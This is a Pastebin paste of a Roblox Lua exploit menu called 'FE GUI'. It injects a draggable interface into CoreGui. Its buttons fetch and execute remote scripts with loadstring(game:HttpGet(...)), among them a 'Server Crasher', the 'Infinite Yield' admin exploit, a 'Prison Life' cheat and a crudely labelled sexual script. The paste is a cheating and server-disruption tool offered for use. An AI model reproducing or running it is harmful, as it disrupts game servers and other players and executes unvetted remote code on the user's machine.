AlexRobKitYT

(BETA) FE GUI

Jun 23rd, 2020
141
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 4.26 KB | None | 0 0
  1. local FE_GuiWORKING = Instance.new("ScreenGui")
  2. local main = Instance.new("Frame")
  3. local fe = Instance.new("TextButton")
  4. local TextLabel = Instance.new("TextLabel")
  5. local TextLabel_2 = Instance.new("TextLabel")
  6. local games = Instance.new("TextButton")
  7. local FE_Frame = Instance.new("Frame")
  8. local TextLabel_3 = Instance.new("TextLabel")
  9. local SCFrame = Instance.new("ScrollingFrame")
  10. local UIListLayout = Instance.new("UIListLayout")
  11. local Crasher = Instance.new("TextButton")
  12. local Poses = Instance.new("TextButton")
  13. local IYield = Instance.new("TextButton")
  14. local PENIS = Instance.new("TextButton")
  15. local Games_Frame = Instance.new("Frame")
  16. local TextLabel_4 = Instance.new("TextLabel")
  17. local SCFrame_2 = Instance.new("ScrollingFrame")
  18. local UIListLayout_2 = Instance.new("UIListLayout")
  19. local PrisonLife = Instance.new("TextButton")
  20.  
  21.  
  22.  
  23. FE_GuiWORKING.Name = "FE_Gui.WORKING!"
  24. FE_GuiWORKING.Parent = game.CoreGui
  25. FE_GuiWORKING.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  26. FE_GuiWORKING.ResetOnSpawn = false
  27.  
  28. main.Name = "main"
  29. main.Parent = FE_GuiWORKING
  30. main.BackgroundColor3 = Color3.fromRGB(20, 114, 255)
  31. main.BorderSizePixel = 0
  32. main.Position = UDim2.new(-0.00092418259, 0, -2.98023224e-08, 0)
  33. main.Size = UDim2.new(0, 385, 0, 197)
  34.  
  35. fe.Name = "fe"
  36. fe.Parent = main
  37. fe.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  38. fe.BorderSizePixel = 4
  39. fe.Position = UDim2.new(0.0285714269, 0, 0.34517765, 0)
  40. fe.Size = UDim2.new(0, 155, 0, 30)
  41. fe.Font = Enum.Font.SourceSans
  42. fe.Text = "FE Scripts"
  43. fe.TextColor3 = Color3.fromRGB(255, 255, 255)
  44. fe.TextScaled = true
  45. fe.TextSize = 14.000
  46. fe.TextStrokeTransparency = 0.000
  47. fe.TextWrapped = true
  48.  
  49. TextLabel.Parent = main
  50. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  51. TextLabel.BackgroundTransparency = 1.000
  52. TextLabel.Size = UDim2.new(0, 385, 0, 54)
  53. TextLabel.Font = Enum.Font.SourceSans
  54. TextLabel.Text = "FE Gui"
  55. TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
  56. TextLabel.TextScaled = true
  57. TextLabel.TextSize = 14.000
  58. TextLabel.TextStrokeTransparency = 0.000
  59. TextLabel.TextWrapped = true
  60.  
  61. TextLabel_2.Parent = main
  62. TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  63. TextLabel_2.BackgroundTransparency = 1.000
  64. TextLabel_2.Position = UDim2.new(0.758441567, 0, 0.852791965, 0)
  65. TextLabel_2.Size = UDim2.new(0, 93, 0, 28)
  66. TextLabel_2.Font = Enum.Font.SourceSansItalic
  67. TextLabel_2.Text = "Auto Updates ~"
  68. TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
  69. TextLabel_2.TextScaled = true
  70. TextLabel_2.TextSize = 14.000
  71. TextLabel_2.TextStrokeTransparency = 0.000
  72. TextLabel_2.TextWrapped = true
  73.  
  74. games.Name = "games"
  75. games.Parent = main
  76. games.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  77. games.BorderSizePixel = 4
  78. games.Position = UDim2.new(0.0285714269, 0, 0.614213169, 0)
  79. games.Size = UDim2.new(0, 155, 0, 30)
  80. games.Font = Enum.Font.SourceSans
  81. games.Text = "Games"
  82. games.TextColor3 = Color3.fromRGB(255, 255, 255)
  83. games.TextScaled = true
  84. games.TextSize = 14.000
  85. games.TextStrokeTransparency = 0.000
  86. games.TextWrapped = true
  87.  
  88. FE_Frame.Name = "FE_Frame"
  89. FE_Frame.Parent = FE_GuiWORKING
  90. FE_Frame.BackgroundColor3 = Color3.fromRGB(20, 114, 255)
  91. FE_Frame.BorderSizePixel = 0
  92. FE_Frame.Position = UDim2.new(0.36783734, 0, 0, 0)
  93. FE_Frame.Size = UDim2.new(0, 384, 0, 196)
  94. FE_Frame.Visible = false
  95.  
  96. TextLabel_3.Parent = FE_Frame
  97. TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  98. TextLabel_3.BackgroundTransparency = 1.000
  99. TextLabel_3.Size = UDim2.new(0, 385, 0, 54)
  100. TextLabel_3.Font = Enum.Font.SourceSans
  101. TextLabel_3.Text = "Fe Scripts"
  102. TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
  103. TextLabel_3.TextScaled = true
  104. TextLabel_3.TextSize = 14.000
  105. TextLabel_3.TextStrokeTransparency = 0.000
  106. TextLabel_3.TextWrapped = true
  107.  
  108. SCFrame.Name = "SCFrame"
  109. SCFrame.Parent = FE_Frame
  110. SCFrame.Active = true
  111. SCFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  112. SCFrame.BackgroundTransparency = 1.000
  113. SCFrame.Position = UDim2.new(0, 0, 0.285714298, 0)
  114. SCFrame.Size = UDim2.new(0, 384, 0, 140)
  115. SCFrame.CanvasPosition = Vector2.new(0, 150)
  116.  
  117. UIListLayout.Parent = SCFrame
  118. UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder
  119.  
  120. Crasher.Name = "Crasher"
  121. Crasher.Parent = SCFrame
  122. Crasher.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  123. Crasher.BorderSizePixel = 0
  124. Crasher.Size = UDim2.new(0, 370, 0, 50)
  125. Crasher.Font = Enum.Font.SourceSans
  126. Crasher.Text = "Server Crasher (Sometimes work, 30secs to load)"
  127. Crasher.TextColor3 = Color3.fromRGB(0, 0, 0)
  128. Crasher.TextScaled = true
  129. Crasher.TextSize = 14.000
  130. Crasher.TextWrapped = true
  131.  
  132. Poses.Name = "Poses"
  133. Poses.Parent = SCFrame
  134. Poses.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  135. Poses.BorderSizePixel = 0
  136. Poses.Size = UDim2.new(0, 370, 0, 50)
  137. Poses.Font = Enum.Font.SourceSans
  138. Poses.Text = "Poses (r6)"
  139. Poses.TextColor3 = Color3.fromRGB(0, 0, 0)
  140. Poses.TextScaled = true
  141. Poses.TextSize = 14.000
  142. Poses.TextWrapped = true
  143.  
  144. IYield.Name = "IYield"
  145. IYield.Parent = SCFrame
  146. IYield.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  147. IYield.BorderSizePixel = 0
  148. IYield.Size = UDim2.new(0, 370, 0, 50)
  149. IYield.Font = Enum.Font.SourceSans
  150. IYield.Text = "Infinite Yield"
  151. IYield.TextColor3 = Color3.fromRGB(0, 0, 0)
  152. IYield.TextScaled = true
  153. IYield.TextSize = 14.000
  154. IYield.TextWrapped = true
  155.  
  156. PENIS.Name = "PENIS"
  157. PENIS.Parent = SCFrame
  158. PENIS.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  159. PENIS.BorderSizePixel = 0
  160. PENIS.Size = UDim2.new(0, 370, 0, 50)
  161. PENIS.Font = Enum.Font.SourceSans
  162. PENIS.Text = "Penis (hot oWo)"
  163. PENIS.TextColor3 = Color3.fromRGB(0, 0, 0)
  164. PENIS.TextScaled = true
  165. PENIS.TextSize = 14.000
  166. PENIS.TextWrapped = true
  167.  
  168. Games_Frame.Name = "Games_Frame"
  169. Games_Frame.Parent = FE_GuiWORKING
  170. Games_Frame.BackgroundColor3 = Color3.fromRGB(20, 114, 255)
  171. Games_Frame.BorderSizePixel = 0
  172. Games_Frame.Position = UDim2.new(0.36783734, 0, 0, 0)
  173. Games_Frame.Size = UDim2.new(0, 384, 0, 196)
  174. Games_Frame.Visible = false
  175.  
  176. TextLabel_4.Parent = Games_Frame
  177. TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  178. TextLabel_4.BackgroundTransparency = 1.000
  179. TextLabel_4.Size = UDim2.new(0, 385, 0, 54)
  180. TextLabel_4.Font = Enum.Font.SourceSans
  181. TextLabel_4.Text = "Games"
  182. TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255)
  183. TextLabel_4.TextScaled = true
  184. TextLabel_4.TextSize = 14.000
  185. TextLabel_4.TextStrokeTransparency = 0.000
  186. TextLabel_4.TextWrapped = true
  187.  
  188. SCFrame_2.Name = "SCFrame"
  189. SCFrame_2.Parent = Games_Frame
  190. SCFrame_2.Active = true
  191. SCFrame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  192. SCFrame_2.BackgroundTransparency = 1.000
  193. SCFrame_2.Position = UDim2.new(0, 0, 0.285714298, 0)
  194. SCFrame_2.Size = UDim2.new(0, 384, 0, 140)
  195.  
  196. UIListLayout_2.Parent = SCFrame_2
  197. UIListLayout_2.SortOrder = Enum.SortOrder.LayoutOrder
  198.  
  199. PrisonLife.Name = "PrisonLife"
  200. PrisonLife.Parent = SCFrame_2
  201. PrisonLife.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  202. PrisonLife.BorderSizePixel = 0
  203. PrisonLife.Size = UDim2.new(0, 370, 0, 50)
  204. PrisonLife.Font = Enum.Font.SourceSans
  205. PrisonLife.Text = "Prison Life"
  206. PrisonLife.TextColor3 = Color3.fromRGB(0, 0, 0)
  207. PrisonLife.TextScaled = true
  208. PrisonLife.TextSize = 14.000
  209. PrisonLife.TextWrapped = true
  210.  
  211. -- Scripts:
  212.  
  213. local function HNVC_fake_script() -- fe.LocalScript
  214.     local script = Instance.new('LocalScript', fe)
  215.  
  216.     script.Parent.MouseButton1Click:Connect(function()
  217.         script.Parent.Parent.Parent.FE_Frame.Visible = not script.Parent.Parent.Parent.FE_Frame.Visible
  218.     end)
  219. end
  220. coroutine.wrap(HNVC_fake_script)()
  221. local function GZJO_fake_script() -- games.LocalScript
  222.     local script = Instance.new('LocalScript', games)
  223.  
  224.     script.Parent.MouseButton1Click:Connect(function()
  225.         script.Parent.Parent.Parent.Games_Frame.Visible = not script.Parent.Parent.Parent.Games_Frame.Visible
  226.     end)
  227. end
  228. coroutine.wrap(GZJO_fake_script)()
  229. local function ZDAGA_fake_script() -- main.Dragify
  230.     local script = Instance.new('LocalScript', main)
  231.  
  232.     local UIS = game:GetService("UserInputService")
  233.     function dragify(Frame)
  234.         dragToggle = nil
  235.         local dragSpeed = 0
  236.         dragInput = nil
  237.         dragStart = nil
  238.         local dragPos = nil
  239.         function updateInput(input)
  240.             local Delta = input.Position - dragStart
  241.             local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
  242.             game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.25), {Position = Position}):Play()
  243.         end
  244.         Frame.InputBegan:Connect(function(input)
  245.             if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
  246.                 dragToggle = true
  247.                 dragStart = input.Position
  248.                 startPos = Frame.Position
  249.                 input.Changed:Connect(function()
  250.                     if input.UserInputState == Enum.UserInputState.End then
  251.                         dragToggle = false
  252.                     end
  253.                 end)
  254.             end
  255.         end)
  256.         Frame.InputChanged:Connect(function(input)
  257.             if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
  258.                 dragInput = input
  259.             end
  260.         end)
  261.         game:GetService("UserInputService").InputChanged:Connect(function(input)
  262.             if input == dragInput and dragToggle then
  263.                 updateInput(input)
  264.             end
  265.         end)
  266.     end
  267.    
  268.     dragify(script.Parent)
  269. end
  270. coroutine.wrap(ZDAGA_fake_script)()
  271. local function OSQZF_fake_script() -- FE_Frame.Dragify
  272.     local script = Instance.new('LocalScript', FE_Frame)
  273.  
  274.     local UIS = game:GetService("UserInputService")
  275.     function dragify(Frame)
  276.         dragToggle = nil
  277.         local dragSpeed = 0
  278.         dragInput = nil
  279.         dragStart = nil
  280.         local dragPos = nil
  281.         function updateInput(input)
  282.             local Delta = input.Position - dragStart
  283.             local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
  284.             game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.25), {Position = Position}):Play()
  285.         end
  286.         Frame.InputBegan:Connect(function(input)
  287.             if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
  288.                 dragToggle = true
  289.                 dragStart = input.Position
  290.                 startPos = Frame.Position
  291.                 input.Changed:Connect(function()
  292.                     if input.UserInputState == Enum.UserInputState.End then
  293.                         dragToggle = false
  294.                     end
  295.                 end)
  296.             end
  297.         end)
  298.         Frame.InputChanged:Connect(function(input)
  299.             if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
  300.                 dragInput = input
  301.             end
  302.         end)
  303.         game:GetService("UserInputService").InputChanged:Connect(function(input)
  304.             if input == dragInput and dragToggle then
  305.                 updateInput(input)
  306.             end
  307.         end)
  308.     end
  309.    
  310.     dragify(script.Parent)
  311. end
  312. coroutine.wrap(OSQZF_fake_script)()
  313. local function BQQR_fake_script() -- Crasher.LocalScript
  314.     local script = Instance.new('LocalScript', Crasher)
  315.  
  316.     script.Parent.MouseButton1Click:Connect(function()
  317.         loadstring(game:HttpGet("https://pastebin.com/raw/mK1GyCdT", true))()
  318.     end)
  319. end
  320. coroutine.wrap(BQQR_fake_script)()
  321. local function FOJL_fake_script() -- Poses.LocalScript
  322.     local script = Instance.new('LocalScript', Poses)
  323.  
  324.     script.Parent.MouseButton1Click:Connect(function()
  325.         loadstring(game:HttpGet("https://pastebin.com/raw/8fCLbpt3", true))()
  326.     end)
  327. end
  328. coroutine.wrap(FOJL_fake_script)()
  329. local function GOVF_fake_script() -- IYield.LocalScript
  330.     local script = Instance.new('LocalScript', IYield)
  331.  
  332.     script.Parent.MouseButton1Click:Connect(function()
  333.         loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))()
  334.     end)
  335. end
  336. coroutine.wrap(GOVF_fake_script)()
  337. local function WWOW_fake_script() -- PENIS.LocalScript
  338.     local script = Instance.new('LocalScript', PENIS)
  339.  
  340.     script.Parent.MouseButton1Click:Connect(function()
  341.         loadstring(game:HttpGet("https://pastebin.com/raw/R6fFmCfk", true))()
  342.     end)
  343. end
  344. coroutine.wrap(WWOW_fake_script)()
  345. local function OLDY_fake_script() -- Games_Frame.Dragify
  346.     local script = Instance.new('LocalScript', Games_Frame)
  347.  
  348.     local UIS = game:GetService("UserInputService")
  349.     function dragify(Frame)
  350.         dragToggle = nil
  351.         local dragSpeed = 0
  352.         dragInput = nil
  353.         dragStart = nil
  354.         local dragPos = nil
  355.         function updateInput(input)
  356.             local Delta = input.Position - dragStart
  357.             local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
  358.             game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.25), {Position = Position}):Play()
  359.         end
  360.         Frame.InputBegan:Connect(function(input)
  361.             if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
  362.                 dragToggle = true
  363.                 dragStart = input.Position
  364.                 startPos = Frame.Position
  365.                 input.Changed:Connect(function()
  366.                     if input.UserInputState == Enum.UserInputState.End then
  367.                         dragToggle = false
  368.                     end
  369.                 end)
  370.             end
  371.         end)
  372.         Frame.InputChanged:Connect(function(input)
  373.             if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
  374.                 dragInput = input
  375.             end
  376.         end)
  377.         game:GetService("UserInputService").InputChanged:Connect(function(input)
  378.             if input == dragInput and dragToggle then
  379.                 updateInput(input)
  380.             end
  381.         end)
  382.     end
  383.    
  384.     dragify(script.Parent)
  385. end
  386. coroutine.wrap(OLDY_fake_script)()
  387. local function LALUTP_fake_script() -- PrisonLife.LocalScript
  388.     local script = Instance.new('LocalScript', PrisonLife)
  389.  
  390.     script.Parent.MouseButton1Click:Connect(function()
  391.         loadstring(game:HttpGet("https://pastebin.com/raw/6mhZBAkh", true))()
  392.     end)
  393. end
  394. coroutine.wrap(LALUTP_fake_script)()
Add Comment
Please, Sign In to add comment